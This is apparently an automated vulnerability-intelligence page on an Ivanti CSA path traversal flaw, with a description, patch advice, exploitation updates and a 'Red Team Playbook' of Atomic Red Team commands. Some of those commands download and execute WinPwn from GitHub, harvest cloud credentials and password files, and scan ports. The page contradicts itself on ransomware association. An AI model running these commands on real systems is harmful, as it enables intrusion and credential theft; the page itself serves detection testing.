CVE-2024-8963
Overview
This vulnerability is a path traversal flaw rooted in insufficient validation of user-supplied input within the Ivanti Cloud Services Appliance (CSA) prior to version 4.6 Patch 519. The affected component improperly sanitizes file path parameters, allowing crafted requests to manipulate directory traversal sequences. This flaw exists in the appliance's web service handling mechanism, enabling unauthorized access to restricted internal resources.
Vulnerability Description
Path Traversal in the Ivanti CSA before 4.6 Patch 519 allows a remote unauthenticated attacker to access restricted functionality.
Impact
An unauthenticated remote attacker can leverage this vulnerability to access restricted administrative functions and sensitive configuration files within the Ivanti CSA environment. This unauthorized access enables potential control over user management features and sensitive system settings. No prior authentication or user interaction is required, allowing attackers to compromise confidentiality and integrity of the appliance, which may lead to full system compromise or lateral movement within the affected network.
Solution
Ivanti has released a security advisory recommending upgrading Ivanti CSA to version 4.6 Patch 519 or later to remediate this vulnerability. Detailed patch instructions and advisory information are available at Ivanti's official security advisory portal (https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-CSA-4-6-Cloud-Services-Appliance-CVE-2024-8963). Users should apply the patch promptly to mitigate unauthorized access risks.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability present in the Ivanti Endpoint Manager Cloud Services Appliance prior to version 4.6 Patch 519 is characterized by a path traversal flaw. This type of vulnerability allows an attacker to manipulate file paths in such a way that they can gain unauthorized access to files and directories that are outside the intended scope of the application. By exploiting this weakness, a remote unauthenticated attacker can potentially access sensitive configuration files or other restricted functionalities that should remain protected. The flaw arises from inadequate validation of user input, which permits the inclusion of directory traversal sequences, such as "../", in requests made to the server.
Attack vectors for this vulnerability are particularly concerning due to the remote and unauthenticated nature of the exploitation. An attacker could craft specially designed HTTP requests to the affected application, leveraging the path traversal vulnerability to navigate the file system. For instance, by manipulating the URL or parameters in a request, an attacker could access sensitive files, including those containing credentials or configuration settings. This could lead to further exploitation, such as privilege escalation or lateral movement within the network. The ease of exploitation, combined with the lack of authentication requirements, makes this vulnerability particularly dangerous for organizations that rely on the Ivanti Endpoint Manager for managing their IT infrastructure.
The real-world impact of this vulnerability can be substantial, especially for organizations that utilize the Ivanti Endpoint Manager to manage sensitive data and critical infrastructure. If an attacker successfully exploits this vulnerability, they could gain access to sensitive information that could be used for malicious purposes, such as data theft, system compromise, or launching further attacks within the network. The potential for unauthorized access to sensitive files could lead to significant business risks, including regulatory non-compliance, reputational damage, and financial losses. Organizations may also face increased scrutiny from stakeholders and regulatory bodies, particularly if sensitive data is exposed as a result of the breach.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regular vulnerability assessments and penetration testing should be conducted to identify and remediate any existing weaknesses in their systems. Additionally, organizations should ensure that they are running the latest version of the Ivanti Endpoint Manager, including applying all relevant patches, to protect against known vulnerabilities. Implementing Web Application Firewalls (WAF) can also help to filter and monitor HTTP requests, blocking those that exhibit signs of path traversal attempts. Furthermore, organizations should enforce strict access controls and logging mechanisms to monitor for unusual activity that could indicate an attempted exploitation of this vulnerability.
In conclusion, the path traversal vulnerability in the Ivanti Endpoint Manager Cloud Services Appliance poses a significant threat to organizations that utilize this software. The ability for a remote unauthenticated attacker to access restricted functionalities can lead to serious security breaches, compromising sensitive data and potentially resulting in severe business repercussions. By adopting proactive detection and mitigation strategies, organizations can better protect themselves against this and similar vulnerabilities, ensuring the integrity and security of their IT environments.
CSURFACE threat intelligence has detected a slight increase in activity related to CVE-2024-8963, indicating a modest rise in attempts to exploit the path traversal vulnerability in Ivanti CSA. While the overall exploitation trend remains stable and no new ransomware associations have emerged, the uptick in detections suggests that threat actors continue to probe this weakness, potentially seeking unauthorized access to restricted functionalities. The availability of a new proof-of-concept exploit on public repositories may contribute to sustained interest and opportunistic scanning. Although the risk of widespread exploitation has not escalated dramatically, defenders should remain vigilant as this vulnerability continues to attract attention from the attacker community. The current telemetry does not indicate a rapid increase in exploitation campaigns, and ransomware groups have not been linked to this vulnerability, maintaining its threat profile at a critical but contained level.
Update 2 — May 20, 2026
The recent adjustment of the CVSS score from 9.1 to 9.4 for CVE-2024-8963 reflects a refined understanding of the vulnerability’s criticality, underscoring its potential impact on affected Ivanti CSA deployments. Despite this increase, CSURFACE threat intelligence reports a significant reduction in exploitation attempts detected by our telemetry, suggesting a possible decline in active targeting or a shift in attacker focus. The EPSS score remains high but stable, indicating that while the vulnerability continues to be relevant in the threat landscape, the likelihood of widespread exploitation has not materially changed. Notably, ransomware groups remain unassociated with this vulnerability, and no emergent ransomware campaigns have been linked, which maintains the current risk profile as critical but contained. Defenders should interpret these developments as a signal that although the vulnerability’s severity is now rated higher, the operational threat environment has not intensified, emphasizing the importance of sustained vigilance without immediate escalation in response posture.
Update 3 — June 09, 2026
Recent updates to the CVE-2024-8963 vulnerability reveal a slight downward adjustment in the CVSS score from 9.4 to 9.1, reflecting a refined understanding of its impact severity. Concurrently, our telemetry indicates a significant reduction in detection activity, suggesting a possible decline in opportunistic exploitation attempts or improved defensive postures among affected environments. However, this decrease in observed exploitation is counterbalanced by the emergence of new proof-of-concept tools publicly available on GitHub, which broadens the exploit landscape and potentially lowers the barrier for adversaries to weaponize this vulnerability. The EPSS score remains stable with a marginal increase, underscoring a persistent likelihood of exploitation despite reduced detection signals. Importantly, ransomware groups continue to show no association with this vulnerability, maintaining the current risk profile without escalation toward ransomware-driven campaigns. For defenders, these developments underscore a nuanced threat environment where active exploitation may be less frequent, yet the availability of new exploit code sustains the criticality of the vulnerability. The overall threat level remains critical but contained, emphasizing the need for ongoing vigilance without immediate changes to defensive strategies.
Update 4 — June 17, 2026
CSURFACE threat intelligence has detected a notable increase in activity related to CVE-2024-8963, with telemetry indicating a steady upward trend in exploit attempts. This rise coincides with a higher EPSS score, reflecting growing likelihood of exploitation in the wild. Additionally, new proof-of-concept exploits have surfaced publicly, potentially lowering the barrier for threat actors to weaponize this vulnerability. Despite this uptick, there remains no evidence linking the vulnerability to ransomware campaigns or known threat actor groups, which maintains the current profile of exploitation primarily by opportunistic attackers rather than organized ransomware operators. For defenders, this evolving landscape signals an elevated risk of unauthorized access attempts targeting Ivanti CSA environments, underscoring the criticality of monitoring and detection efforts. While the overall threat level remains critical, the increase in exploitation signals and exploit availability warrants heightened vigilance as adversaries may accelerate targeting efforts in the near term.
Affected Products (3)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Ivanti | Endpoint Manager Cloud Services Appliance | 4.6 |
cpe:2.3:a:ivanti:endpoint_manager_cloud_services_appliance:4.6:-:*:*:*:*:*:*
|
|
|
Ivanti | Endpoint Manager Cloud Services Appliance | 4.6 |
cpe:2.3:a:ivanti:endpoint_manager_cloud_services_appliance:4.6:patch_512:*:*:*:*:*:*
|
|
|
Ivanti | Endpoint Manager Cloud Services Appliance | 4.6 |
cpe:2.3:a:ivanti:endpoint_manager_cloud_services_appliance:4.6:patch_518:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
PoC
|
- | 0 | 0 | - | View |
|
patfire94/CVE-2024-8963
Ivanti Cloud Services Appliance - Path Traversal
|
patfire94 | 0 | 0 | 2024-11-13 | View |
Threat Feed
33 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-8963 |
| forums.ivanti.com |
GitHub CVE
|
https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-CSA-4-6-Cloud-Services-Appliance-CVE-2024-8963 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-8963 |